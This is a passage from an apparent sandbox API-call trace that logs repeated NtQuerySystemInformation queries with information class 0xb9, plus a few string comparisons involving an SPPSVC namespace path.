ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x28, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x28, ResultLength=0x0) [0240.632] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed50, Length=0x28, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x28, ResultLength=0x0) [0240.641] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed50, Length=0x28, ResultLength=0x0) [0240.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.650] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.656] NtQuerySystemInformation (SystemInformationClass=0xb9, 